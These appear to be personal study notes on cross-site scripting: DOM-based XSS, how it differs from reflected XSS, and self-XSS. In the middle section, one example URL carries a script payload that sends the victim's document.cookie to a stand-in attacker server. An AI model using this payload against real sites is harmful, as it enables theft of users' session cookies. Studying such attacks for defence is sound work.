
---
- #### **DOM-based XSS is similar to reflected XSS**, 
	except that in DOM, the user input never leaves the user’s browser. 
	the application takes in user input, processes it on the victim’s browser, returns it to the user
---
- #### **The Document Object Model (DOM)**
	- DOM-based XSS targets a web page’s DOM directly: 
	- it attacks the client’s local copy of the web page instead of going through the server.
	- Attackers are able to attack the DOM when a page takes user-supplied data and dynamically alters the DOM based on that input. 
	- JavaScript libraries like jQuery are prone to DOM-based XSS since they dynamically alter DOM elements.
---
- #### **reflected XSS vs DOM-based XSS**
	As in reflected XSS, attackers submit DOM-based XSS payloads via the victim’s user input. 
	Unlike reflected XSS, a DOM-based XSS script **doesn’t require server involvement**, 
	because it executes when user input modifies the source code of page in the browser directly. 
	
	The XSS script is never sent to the server, so the HTTP response from the server won’t change.
	The URL parameter isn’t submitted to the server. **Instead**, it’s used locally, by the user’s browser, to construct a web page by using a client-side script. 
	- if website doesn’t validate the user-submitted locale parameter, an attacker can trick users into visiting a URL like this one: https://example.com?locale=<script>location='http://attacker_server_ip/?c='+document.cookie;</script>
	- The site will embed the payload on the user’s web page, and the victim’s browser will execute the malicious script. DOM XSS may sound a lot like reflected XSS at first. 
	- **The Difference** is that the reflected XSS payload gets sent to the server and returned to the user’s browser within an HTTP response. 
	  **On the other hand**, the DOM XSS payload is injected into a page because of client-side code rendering user input in an insecure manner. 
	  **Although** the results of the two attacks are similar, the processes of testing for them and protecting against them are different.
---
- ### Self-XSS
	require victims to input a malicious payload themselves. 
	- attackers must trick users into doing much more than simply viewing a page or browsing to a particular URL, If you’ve ever seen social media posts or text messages telling you to paste a piece of code into your browser to “do something cool,” it was probably attack code aimed at tricking you into launching self-XSS against yourself



